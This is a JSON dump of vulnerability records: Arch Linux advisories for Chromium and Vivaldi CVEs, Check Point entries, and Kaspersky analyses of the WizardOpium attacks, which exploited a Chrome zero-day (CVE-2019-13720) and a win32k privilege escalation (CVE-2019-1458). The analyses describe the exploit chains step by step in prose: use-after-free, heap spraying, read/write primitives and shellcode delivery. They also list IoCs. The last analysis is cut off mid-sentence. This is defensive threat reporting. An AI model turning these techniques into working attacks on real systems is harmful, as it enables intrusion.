"baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-02T00:00:00", "id": "ASA-201911-2", "href": "https://security.archlinux.org/ASA-201911-2", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:59", "description": "Arch Linux Security Advisory ASA-201911-1\n=========================================\n\nSeverity: Critical\nDate : 2019-11-01\nCVE-ID : CVE-2019-13720 CVE-2019-13721\nPackage : chromium\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1058\n\nSummary\n=======\n\nThe package chromium before version 78.0.3904.87-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 78.0.3904.87-1.\n\n# pacman -Syu \"chromium>=78.0.3904.87-1\"\n\nThe problems have been fixed upstream in version 78.0.3904.87.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2019-13720 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the audio component of\nthe chromium browser before 78.0.3904.87. Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\n- CVE-2019-13721 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the PDFium component\nof the chromium browser before 78.0.3904.87.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://crbug.com/1013868\nhttps://security.archlinux.org/CVE-2019-13720\nhttps://security.archlinux.org/CVE-2019-13721", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-01T00:00:00", "type": "archlinux", "title": "[ASA-201911-1] chromium: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-11-01T00:00:00", "id": "ASA-201911-1", "href": "https://security.archlinux.org/ASA-201911-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T16:33:56", "description": "Arch Linux Security Advisory ASA-202103-19\n==========================================\n\nSeverity: High\nDate : 2021-03-25\nCVE-ID : CVE-2020-27844 CVE-2021-21159 CVE-2021-21160 CVE-2021-21161\nCVE-2021-21162 CVE-2021-21163 CVE-2021-21165 CVE-2021-21166\nCVE-2021-21167 CVE-2021-21168 CVE-2021-21169 CVE-2021-21170\nCVE-2021-21171 CVE-2021-21172 CVE-2021-21173 CVE-2021-21174\nCVE-2021-21175 CVE-2021-21176 CVE-2021-21177 CVE-2021-21178\nCVE-2021-21179 CVE-2021-21180 CVE-2021-21181 CVE-2021-21182\nCVE-2021-21183 CVE-2021-21184 CVE-2021-21185 CVE-2021-21186\nCVE-2021-21187 CVE-2021-21188 CVE-2021-21189 CVE-2021-21190\nCVE-2021-21191 CVE-2021-21192 CVE-2021-21193\nPackage : vivaldi\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1633\n\nSummary\n=======\n\nThe package vivaldi before version 3.7.2218.45-1 is vulnerable to\nmultiple issues including arbitrary code execution, insufficient\nvalidation, access restriction bypass, content spoofing, incorrect\ncalculation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 3.7.2218.45-1.\n\n# pacman -Syu \"vivaldi>=3.7.2218.45-1\"\n\nThe problems have been fixed upstream in version 3.7.2218.45.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-27844 (arbitrary code execution)\n\nA heap-based buffer overflow was discovered in lib/openjp2/t2.c:973 in\nthe current master (commit 18b1138fbe3bb0ae4aa2bf1369f9430a8ec6fa00) of\nOpenJPEG.\n\n- CVE-2021-21159 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the TabStrip\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21160 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the WebAudio\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21161 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the TabStrip\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21162 (arbitrary code execution)\n\nA use after free security issue was found in the WebRTC component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21163 (insufficient validation)\n\nAn insufficient data validation security issue was found in the Reader\nMode component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21165 (arbitrary code execution)\n\nAn object lifecycle security issue was found in the audio component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21166 (arbitrary code execution)\n\nAn object lifecycle security issue was found in the audio component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21167 (arbitrary code execution)\n\nA use after free security issue was found in the bookmarks component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21168 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nappcache component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21169 (information disclosure)\n\nAn out of bounds memory access security issue was found in the V8\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21170 (content spoofing)\n\nAn incorrect security UI security issue was found in the Loader\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21171 (content spoofing)\n\nAn incorrect security UI security issue was found in the TabStrip and\nNavigation components of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21172 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the File\nSystem API component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21173 (information disclosure)\n\nA side-channel information leakage security issue was found in the\nNetwork Internals component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21174 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nReferrer component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21175 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the Site\nisolation component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21176 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the full\nscreen mode component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21177 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nAutofill component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21178 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nCompositing component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21179 (arbitrary code execution)\n\nA use after free security issue was found in the Network Internals\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21180 (arbitrary code execution)\n\nA use after free security issue was found in the tab search component\nof the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21181 (information disclosure)\n\nA side-channel information leakage security issue was found in the\nautofill component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21182 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nnavigations component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21183 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nperformance APIs component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21184 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nperformance APIs component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21185 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nextensions component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21186 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the QR\nscanning component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21187 (insufficient validation)\n\nAn insufficient data validation security issue was found in the URL\nformatting component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21188 (arbitrary code execution)\n\nA use after free security issue was found in the Blink component of the\nChromium browser before version 89.0.4389.72.\n\n- CVE-2021-21189 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\npayments component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21190 (arbitrary code execution)\n\nAn uninitialized use security issue was found in the PDFium component\nof the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21191 (arbitrary code execution)\n\nA use after free security issue was found in the WebRTC component of\nthe Chromium browser before version 89.0.4389.90.\n\n- CVE-2021-21192 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the tab groups\ncomponent of the Chromium browser before version 89.0.4389.90.\n\n- CVE-2021-21193 (arbitrary code execution)\n\nA use after free security issue was found in the Blink component of the\nChromium browser before version 89.0.4389.90. Google is aware of\nreports that an exploit for this issue exists in the wild.\n\nImpact\n======\n\nA remote attacker might be able to bypass security measures, trick the\nuser into performing unwanted actions or execute arbitrary code.\n\nReferences\n==========\n\nhttps://vivaldi.com/blog/desktop/minor-update-2-for-vivaldi-desktop-3-6/\nhttps://vivaldi.com/blog/vivaldi-fires-up-performance-2/\nhttps://github.com/uclouvain/openjpeg/issues/1299\nhttps://github.com/uclouvain/openjpeg/pull/1301\nhttps://github.com/uclouvain/openjpeg/commit/73fdf28342e4594019af26eb6a347a34eceb6296\nhttps://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\nhttps://crbug.com/1171049\nhttps://crbug.com/1170531\nhttps://crbug.com/1173702\nhttps://crbug.com/1172054\nhttps://crbug.com/1111239\nhttps://crbug.com/1174582\nhttps://crbug.com/1177465\nhttps://crbug.com/1161144\nhttps://crbug.com/1152226\nhttps://crbug.com/1166138\nhttps://crbug.com/1111646\nhttps://crbug.com/1152894\nhttps://crbug.com/1150810\nhttps://crbug.com/1154250\nhttps://crbug.com/1158010\nhttps://crbug.com/1146651\nhttps://crbug.com/1170584\nhttps://crbug.com/1173879\nhttps://crbug.com/1174186\nhttps://crbug.com/1174943\nhttps://crbug.com/1175507\nhttps://crbug.com/1182767\nhttps://crbug.com/1049265\nhttps://crbug.com/1105875\nhttps://crbug.com/1131929\nhttps://crbug.com/1100748\nhttps://crbug.com/1153445\nhttps://crbug.com/1155516\nhttps://crbug.com/1161739\nhttps://crbug.com/1165392\nhttps://crbug.com/1166091\nhttps://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html\nhttps://crbug.com/1167357\nhttps://crbug.com/1181387\nhttps://crbug.com/1186287\nhttps://security.archlinux.org/CVE-2020-27844\nhttps://security.archlinux.org/CVE-2021-21159\nhttps://security.archlinux.org/CVE-2021-21160\nhttps://security.archlinux.org/CVE-2021-21161\nhttps://security.archlinux.org/CVE-2021-21162\nhttps://security.archlinux.org/CVE-2021-21163\nhttps://security.archlinux.org/CVE-2021-21165\nhttps://security.archlinux.org/CVE-2021-21166\nhttps://security.archlinux.org/CVE-2021-21167\nhttps://security.archlinux.org/CVE-2021-21168\nhttps://security.archlinux.org/CVE-2021-21169\nhttps://security.archlinux.org/CVE-2021-21170\nhttps://security.archlinux.org/CVE-2021-21171\nhttps://security.archlinux.org/CVE-2021-21172\nhttps://security.archlinux.org/CVE-2021-21173\nhttps://security.archlinux.org/CVE-2021-21174\nhttps://security.archlinux.org/CVE-2021-21175\nhttps://security.archlinux.org/CVE-2021-21176\nhttps://security.archlinux.org/CVE-2021-21177\nhttps://security.archlinux.org/CVE-2021-21178\nhttps://security.archlinux.org/CVE-2021-21179\nhttps://security.archlinux.org/CVE-2021-21180\nhttps://security.archlinux.org/CVE-2021-21181\nhttps://security.archlinux.org/CVE-2021-21182\nhttps://security.archlinux.org/CVE-2021-21183\nhttps://security.archlinux.org/CVE-2021-21184\nhttps://security.archlinux.org/CVE-2021-21185\nhttps://security.archlinux.org/CVE-2021-21186\nhttps://security.archlinux.org/CVE-2021-21187\nhttps://security.archlinux.org/CVE-2021-21188\nhttps://security.archlinux.org/CVE-2021-21189\nhttps://security.archlinux.org/CVE-2021-21190\nhttps://security.archlinux.org/CVE-2021-21191\nhttps://security.archlinux.org/CVE-2021-21192\nhttps://security.archlinux.org/CVE-2021-21193", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-25T00:00:00", "type": "archlinux", "title": "[ASA-202103-19] vivaldi: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193"], "modified": "2021-03-25T00:00:00", "id": "ASA-202103-19", "href": "https://security.archlinux.org/ASA-202103-19", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-11-24T15:23:33", "description": "A use-after-free vulnerability has been reported in Google Chrome WebAudio. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-25T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome WebAudio Use After Free (CVE-2019-13720)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-11-24T00:00:00", "id": "CPAI-2019-1630", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:32:23", "description": "A heap corruption vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-26T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Heap Corruption (CVE-2021-21166)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-07-26T00:00:00", "id": "CPAI-2021-0482", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2019-11-27T10:39:00", "description": "\n\n## Executive summary\n\nKaspersky Exploit Prevention is a component part of Kaspersky products that has successfully detected a number of zero-day attacks in the past. Recently, it caught a new unknown exploit for Google's Chrome browser. We promptly reported this to the Google Chrome security team. After reviewing of the PoC we provided, Google confirmed there was a zero-day vulnerability and assigned it CVE-2019-13720. Google has released Chrome version 78.0.3904.87 for Windows, Mac, and Linux and we recommend all Chrome users to update to this latest version as soon as possible! You can read Google's bulletin by [clicking here](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>).\n\nKaspersky endpoint products detect the exploit with the help of the exploit prevention component. The verdict for this attack is Exploit.Win32.Generic.\n\nWe are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) attacks that have recently deployed similar false flag attacks.\n\nMore details about CVE-2019-13720 and recent DarkHotel false flag attacks are available to customers of Kaspersky Intelligence Reporting. For more information, contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Technical details\n\nThe attack leverages a waterhole-style injection on a Korean-language news portal. A malicious JavaScript code was inserted in the main page, which in turn, loads a profiling script from a remote site.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122729/WizardOpium_CVE-2019-13720_01.png>)\n\n_Redirect to the exploit landing page_\n\nThe main index page hosted a small JavaScript tag that loaded a remote script from hxxp://code.jquery.cdn.behindcorona[.]com/. \n\nThe script then loads another script named _.charlie.XXXXXXXX.js_. This JavaScript checks if the victim's system can be infected by performing a comparison with the browser's user agent, which should run on a _64-bit_ version of _Windows_ and not be a _WOW64_ process; it also tries to get the browser's name and version. The vulnerability tries to exploit the bug in _Google Chrome_ browser and the script checks if the version is greater or equal to 65 (current Chrome version is 78):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122743/WizardOpium_CVE-2019-13720_02.png>)\n\n_Chrome version checks in the profiling script (.charlie.XXXXXXXX.js)_\n\nIf the browser version checks out, the script starts performing a number of AJAX requests to the attacker's controlled server (_behindcorona[.]com_) where a path name points to the argument that is passed to the script (_xxxxxxx.php_). The first request is necessary to obtain some important information for further use. This information includes several hex-encoded strings that tell the script how many chunks of the actual exploit code should be downloaded from the server, as well as a URL to the image file that embeds a key for the final payload and RC4 key to decrypt these chunks of the exploit's code.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122755/WizardOpium_CVE-2019-13720_03.png>)\n\n_Exploitation chain - AJAX requests to xxxxxxx.php_\n\nAfter downloading all the chunks, the _RC4_ script decrypts and concatenates all the parts together, which gives the attacker a new JavaScript code containing the full browser exploit. To decrypt the parts, the previously retrieved RC4 key is used.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122805/WizardOpium_CVE-2019-13720_04.png>)\n\n_One more version check_\n\nThe browser exploit script is obfuscated; after de-obfuscation we observed a few peculiar things:\n\n 1. Another check is made against the user agent's string - this time it checks that the browser version is 76 or 77. It could mean that the exploit authors have only worked on these versions (a previous exploitation stage checked for version number 65 or newer) or that other exploits have been used in the past for older Chrome versions. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122818/WizardOpium_CVE-2019-13720_05.png>)\n\n_Obfuscated exploit code _\n\n 2. There are a few functions that operate on the browser's built-in _BigInt_ class, which is useful for doing 64-bit arithmetic inside JavaScript code, for example, to work with native pointers in a 64-bit environment. Usually, exploit developers implements their own functions for doing this by working with 32-bit numbers. However, in this case, _BigInt_ is used, which should be faster because it's implemented natively in the browser's code. The exploit developers don't use all 64 bits here, but instead operate on a smaller range of numbers. This is why they implement a few functions to work with higher/lower parts of the number. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122829/WizardOpium_CVE-2019-13720_06.png>)\n\n_Snippet of code to work with 64-bit numbers_\n\n 3. There are many functions and variables that are not used in the actual code. This usually means that they were used for debugging code and were then left behind when the code was moved to production.\n 4. The majority of the code uses several classes related to a certain vulnerable component of the browser. As this bug has still not been fixed, we are not including details about the specific vulnerable component here.\n 5. There are a few big arrays with numbers that represent a shellcode block and an embedded PE image.\n\nThe analysis we have provided here is deliberately brief due to vulnerability disclosure principles. The exploit used a _race condition_ bug between two threads due to _missing proper synchronization_ between them. It gives an attacker an a _Use-After-Free (UaF)_ condition that is very dangerous because it can lead to code execution scenarios, which is exactly what happens in our case.\n\nThe exploit first tries to trigger _UaF_ to perform an information leak about important 64-bit addresses (as a pointer). This results in a few things: 1) if an address is leaked successfully, it means the exploit is working correctly; 2) a leaked address is used to know where the heap/stack is located and that defeats the _address space layout randomization (ASLR)_ technique; 3) a few other useful pointers for further exploitation could be located by searching near this address. \n\nAfter that it tries to create a bunch of large objects using a recursive function. This is done to make some deterministic heap layout, which is important for a successful exploitation. At the same time, it attempts to utilize a heap spraying technique that aims to reuse the same pointer that was freed earlier in the UaF part. This trick could be used to cause confusion and give the attacker the ability to operate on two different objects (from a JavaScript code perspective), though in reality they are located in the same memory region.\n\nThe exploit attempts to perform numerous operations to allocate/free memory along with other techniques that eventually give the attackers an arbitrary read/write primitive. This is used to craft a special object that can be used with _WebAssembly_ and _FileReader_ together to perform code execution for the embedded shellcode payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122845/WizardOpium_CVE-2019-13720_07.png>)\n\n_First stage shellcode_\n\n## Payload description\n\nThe final payload is downloaded as an encrypted binary (worst.jpg) that is decrypted by the shellcode.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122905/WizardOpium_CVE-2019-13720_08.png>)\n\n_Encrypted payload - worst.jpg_\n\nAfter decryption, the malware module is dropped as updata.exe to disk and executed. For persistence the malware installs tasks in Windows Task Scheduler. \n\nThe payload 'installer' is a RAR SFX archive, with the following information:\n\nFile size: 293,403 \nMD5: 8f3cd9299b2f241daf1f5057ba0b9054 \nSHA256: 35373d07c2e408838812ff210aa28d90e97e38f2d0132a86085b0d54256cc1cd\n\nThe archive contains two files:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01152326/WizardOpium_CVE-2019-13720_code.png>)\n\nFile name: iohelper.exe \nMD5: 27e941683d09a7405a9e806cc7d156c9 \nSHA256: 8fb2558765cf648305493e1dfea7a2b26f4fc8f44ff72c95e9165a904a9a6a48 \n\nFile name: msdisp64.exe \nMD5: f614909fbd57ece81d00b01958338ec2 \nSHA256: cafe8f704095b1f5e0a885f75b1b41a7395a1c62fd893ef44348f9702b3a0deb \n\nBoth files were compiled at the same time, which if we are to believe the timestamp, was \"Tue Oct 8 01:49:31 2019\". \nThe main module (msdisp64.exe) tries to download the next stage from a hardcoded C2 server set. The next stages are located on the C2 server in folders with the victim computer names, so the threat actors have information about which machines were infected and place the next stage modules in specific folders on the C2 server. \n\nMore details about this attack are available to customers of Kaspersky Intelligence Reporting. For more information, contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>). \n\n## IoCs\n\n * behindcorona[.]com\n * code.jquery.cdn.behindcorona[.]com\n * 8f3cd9299b2f241daf1f5057ba0b9054\n * 35373d07c2e408838812ff210aa28d90e97e38f2d0132a86085b0d54256cc1cd\n * 27e941683d09a7405a9e806cc7d156c9\n * 8fb2558765cf648305493e1dfea7a2b26f4fc8f44ff72c95e9165a904a9a6a48 \n * f614909fbd57ece81d00b01958338ec2\n * cafe8f704095b1f5e0a885f75b1b41a7395a1c62fd893ef44348f9702b3a0deb \n * kennethosborne@protonmail.com", "cvss3": {}, "published": "2019-11-01T16:00:12", "type": "securelist", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-01T16:00:12", "id": "SECURELIST:B3F6FE1E8EA0830B8B1306E79A2E63EA", "href": "https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-12T11:22:50", "description": "\n\nIn November 2019, Kaspersky technologies [successfully detected](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) a Google Chrome 0-day exploit that was used in Operation WizardOpium attacks. During our investigation, we discovered that yet another 0-day exploit was used in those attacks. The exploit for Google Chrome embeds a 0-day EoP exploit (CVE-2019-1458) that is used to gain higher privileges on the infected machine as well as escaping the Chrome process sandbox. The exploit is very similar to those developed by the prolific 0-day developer known as 'Volodya'.\n\nThe EoP exploit consists of two stages: a tiny PE loader and the actual exploit. After achieving a read/write primitive in the renderer process of the browser through vulnerable JS code, the PE exploit corrupts some pointers in memory to redirect code execution to the PE loader. This is done to bypass sandbox restrictions because the PE exploit cannot simply start a new process using native WinAPI functions.\n\nThe PE loader locates an embedded DLL file with the actual exploit and repeats the same process as the native Windows PE loader \u2013 parsing PE headers, handling imports/exports, etc. After that, a code execution is redirected to the entry point of the DLL \u2013 the DllEntryPoint function. The PE code then creates a new thread, which is an entry point for the exploit itself, and the main thread simply waits until it stops.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134554/windows_0day_wizardopium_01.png>)\n\n_EoP exploit used in the attack_\n\nThe PE file encapsulating this EoP exploit has the following header:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134603/windows_0day_wizardopium_02.png>)\n\nThe compilation timestamp of Wed Jul 10 00:50:48 2019 is different from the other binaries, indicating it has been in use for some time.\n\nOur detailed analysis of the EoP exploit revealed that the vulnerability it used belongs to the win32k.sys driver and that the EoP exploit was the 0-day exploit because it works on the latest (patched) versions of Windows 7 and even on a few builds of Windows 10 (new Windows 10 builds are not affected because they implement measures that prevent the normal usage of the exploitable code).\n\nThe vulnerability itself is related to windows switching functionality (for example, the one triggered using the Alt-Tab key combination). That's why the exploit's code uses a few WinAPI calls (GetKeyState/SetKeyState) to emulate a key press operation.\n\nAt the beginning, the exploit tries to find the operating system version using ntdll.dll's RtlGetVersion call that's used to find a dozen offsets needed to set up fake kernel GDI objects in the memory. At the same time, it tries to leak a few kernel pointers using well-known techniques to leak kernel memory addresses (gSharedInfo, PEB's GdiSharedHandleTable). After that, it tries to create a special memory layout with holes in the heap using many calls to CreateAcceleratorTable/DestroyAcceleratorTable. Then a bunch of calls to CreateBitmap are performed, the addresses to which are leaked using a handle table array.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134611/windows_0day_wizardopium_03.png>)\n\n_Triggering exploitable code path_\n\nAfter that, a few pop-up windows are created and an undocumented syscall NtUserMessageCall is called using their window handles. In addition, it creates a special window with the class of a task switch window (#32771) and it's important to trigger an exploitable code path in the driver. At this step the exploit tries to emulate the Alt key and then using a call to SetBitmapBits it crafts a GDI object which contains a controllable pointer value that is used later in the kernel driver's code (win32k!DrawSwitchWndHilite) after the exploit issues a second undocumented call to the syscall (NtUserMessageCall). That's how it gets an arbitrary kernel read/write primitive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134616/windows_0day_wizardopium_04.png>)\n\n_Achieving 